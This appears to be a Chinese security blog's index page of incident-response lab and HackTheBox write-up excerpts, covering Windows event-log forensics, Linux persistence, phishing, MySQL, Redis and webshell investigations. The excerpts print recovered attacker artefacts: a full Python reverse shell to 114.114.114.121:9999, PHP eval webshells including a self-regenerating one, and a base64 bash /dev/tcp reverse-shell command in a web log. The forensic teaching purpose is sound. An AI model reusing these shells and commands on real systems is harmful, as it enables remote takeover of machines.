• 玄机——第五章-Windows实战-evtx文件分析

  13 Apr 2025

  首先我们需要下载附件，并查看windows系统日志evtx文件。翻看security日志下的事件ID4624，我们可以得知黑客远程登录Windows的IP为192.168.36.133。注意windows登录日志记录的事件ID为4624&4625 黑客修改了登陆用户的用户名。我们需要查看security日志并尝试捕捉到修改后的用户名。这里打了一个小非预期。已知黑客大概率上线后会提权，我们直接查看分配特权的事件ID4672，在众多系统账户中找到一个可疑账户的权限分配。 正常的预期做法是查看4720、4722、4732,对应为创建用户账户、启用用户账户、向安全组内添加成员。注意4728是添加至全局组,4732是添加至本地组。 接下来审计恶意用户尝试访问的关键文件名称。我们转向事件ID4663，即试图访问对象的记录日志。这里有几个敏感文件都记录了位置，就需要我们猜一下了。 经尝试此文件即为我们要提交的目标文件名。 接下来需要我们审计最后一次重启数据库服务的进程ID号。转向应用程序日志，按时间排序并审计来源于Mysql的日志。除去12月的日志，10月日志最后一次mysql启动的日志如下 最后我们需要统计黑客上线后对系统执行的重启的次数。转向System日志，查询事件ID1074，统计后发现此恶意账户重启了两次电脑。 注意修改用户名后使用其用户第一次的reboot，日志并不会将其记录为该用户的reboot请求，而会记录为SYSTEM发起的windows更新请求。

• 玄机——Linux权限维持

  12 Apr 2025

  首先查找隐藏文件信息。容易在tmp文件夹下找到一个隐藏的.temp文件夹，在其中有1.py和shell.py文件。查看1.py文件，可以得到黑客反弹shell的IP与对应端口。 root@xuanji:/tmp/.temp/libprocesshider# cat 1.py #!/usr/bin/python3 import socket,subprocess,os,sys, time pidrg = os.fork() if pidrg > 0: sys.exit(0) os.chdir("/") os.setsid() os.umask(0) drgpid = os.fork() if drgpid > 0: sys.exit(0) while 1: try: sys.stdout.flush() sys.stderr.flush() fdreg = open("/dev/null", "w") sys.stdout = fdreg sys.stderr = fdreg sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM) sdregs.connect(("114.114.114.121",9999)) os.dup2(sdregs.fileno(),0) os.dup2(sdregs.fileno(),1) os.dup2(sdregs.fileno(),2) p=subprocess.call(["/bin/bash","-i"]) sdregs.close() except...

• HTB——Usage

  12 Apr 2025

  0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │...

• HTB——Aero

  12 Apr 2025

  0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__ \| (__ | (_| || | | |/ ___/ |...

• 玄机——钓鱼事件应急

  11 Apr 2025

  桌面上有一个rar文件，下载下来发现有一个pdf文件和一个cmd脚本，猜想是在RAR解压过程中触发此漏洞。查询得知编号为CVE-2023-38831 将cmd病毒样本提取出来后，我们将其甩到云沙箱中查杀一下。可以直接在详情页面查看到一个TCP链接。 但此IP并不是我们的木马下载地址。衍生文件中的pcap流量包中也没有有效数据，我们只能上ida分析。使用tab对main函数反汇编即可查看到下载的恶意木马地址http://192.168.229.156:7001/wls-wsat/7z.exeC:\\Users\\Administrator\\AppData\\Local\\Temp\\7z.exe 使用attrib解除文件隐藏属性，将木马甩到云沙箱内分析，并计算其hash值 找到外连地址为192.168.229.136。在靶机上安装everything扫描得到内网横向的fscan放在C:\Windows\Temp\fscan.exe内。 接下来搜索黑客权限维持所设置的SC任务。使用任务管理器查看服务，查看到一个恶意服务指向木马文件。此即为恶意任务。 影子账户很好找，只需要到Users文件夹下就可以看到一个hack$文件夹。翻看系统日志查找黑客第一次登陆上的时间，查看到此日志 最后我们查看端口的转发规则 得到转发规则

• 玄机——日志分析-mysql应急响应

  11 Apr 2025

  在网站根目录下找到了黑客写入的shell root@xuanji:/var/www/html# cat sh.php 1 2 <?php @eval($_POST['a']);?> //ccfda79e-7aa1-4275-bc26-a6189eb9a20b 我们需要查看黑客反弹shell的IP。那我们查看一下网站访问日志。 192.168.200.2 - - [01/Aug/2023:02:18:18 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%27)%3B HTTP/1.1" 200 4025 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" 其中的base64语句解密后即为黑客反弹shell指令。 我们首先得找到mysql的配置文件，查看网站目录下的common.php发现了数据库账密 root@xuanji:/var/www/html# cat common.php <?php $conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306"); if(!$conn){ echo "数据库连接失败"; } 转到mysql表下的func中，查看导入了什么.so文件进行的提权。 MariaDB [mysql]> select * from func; +----------+-----+-------------+----------+...

• 玄机——Redis应急响应

  11 Apr 2025

  首先我们定位redis日志位置，并初步审计一下日志记录的内容。发现有一个IP登陆成功后在调用恶意so文件 419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888 419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started 419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event. 419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so 至此我们可知攻击的IP.直接HEX查看so文件可以直接搜索到其内部也有一个flag.已知redis要么写webshell要么写计划任务反弹shell，那我们直接就去看计划任务即可 root@ip-10-0-10-2:/var/spool/cron# crontab...

• 玄机——Linux入侵排查

  11 Apr 2025

  首先我们开启靶机。grep一下eval恶意函数，我们可以看到index.php内有后门语句。且sh.php内有第一个flag ./index.php:17:$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>'; ./1.php:1:<?php eval($_POST[1]);?> ./.shell.php:1:<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?> root@xuanji:/var/www/html# cat sh.php 1 2 <?php @eval($_POST['a']);?> 4 //ccfda79e-7aa1-4275-bc26-a6189eb9a20b cmd5网站或hashcat爆一下，得到密码为hello。查看index.php内容，发现其负责生成不死马.shell.php root@ip-10-0-10-1:/var/www/html# cat index.php <?php include('config.php'); include(SYS_ROOT.INC.'common.php'); $path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):''); if(substr($path, 0,1)=='/'){ $path=substr($path,1); } $path = Base::safeword($path); $ctrl=isset($_GET['action'])?$_GET['action']:'run'; if(isset($_GET['createprocess'])) { Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']); }else{ Index::run($path); } $file = '/var/www/html/.shell.php'; $code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>'; file_put_contents($file, $code); system('touch...

• 0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__ \| (__ | (_| || | | |/ ___/ |...

• HTB——Manager

  11 Apr 2025

  0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │...